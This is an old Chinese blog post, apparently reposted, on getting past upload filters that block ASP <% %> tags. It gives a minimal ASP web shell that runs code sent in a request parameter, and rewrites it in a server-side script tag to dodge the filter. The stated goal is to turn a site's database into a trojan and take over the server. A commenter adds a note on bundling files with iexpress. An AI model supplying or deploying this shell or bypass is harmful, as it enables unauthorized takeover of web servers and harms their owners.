寻寻'blog

<<  后知后觉 | 首页 | 周星驰全集下载  >>

• 2006-12-02

  突破〈%%〉标记过滤

  版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
  http://xunblog.blogbus.com/logs/3957627.html
  
  

  突破〈%%〉标记过滤
  很多时候我们可以通过在注册表单或者用户信息修改表单中，插入简短的ASP代码，使网站ASP数据库变成为一个ASP木马，然后进一步入侵控制服务器。不过在上传代码过程中，许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
  这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
  原来的程序代码是“〈%execute request("l")%>", 我们可以把它的标签换下来，改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".这样就避开了使用〈%%〉，保存为.ASP,程序照样执行。效果是一样的

  
  

  历史上的今天：

  周星驰全集下载 2006-12-02

  后知后觉 2006-12-02

  <转载>那些花儿. 2006-12-02

  别人的文字 2006-12-02

  
  

  随机文章：

  另类杀毒 2007-01-07

  如何防止Flash跨站攻击弹出IE窗口 2006-12-21

  网吧母盘制作 2006-12-21

  spoclsv.exe(熊猫烧香变种)解决方案 2006-12-21

  告别F8 把安全模式加到启动列表 2006-12-12

  
  收藏到：Del.icio.us

  
  
  
  
  
  Tag：技术转载

  引用地址：

  xunblog 发表于21:31:41 | 编辑 | 继续话题 | 转发 | 分享　0

评论

• 运行----iexpress
  
  
  
  系统自带的捆绑工具.. 试试看..
  
  
  
  始终相信.系统自带的.是兼容性最好的...
  
  
  
  
  
  大家试一下，我还没试呢~~
  
  
  煤质 | 发表于2006-12-02 23:07:55 [回复]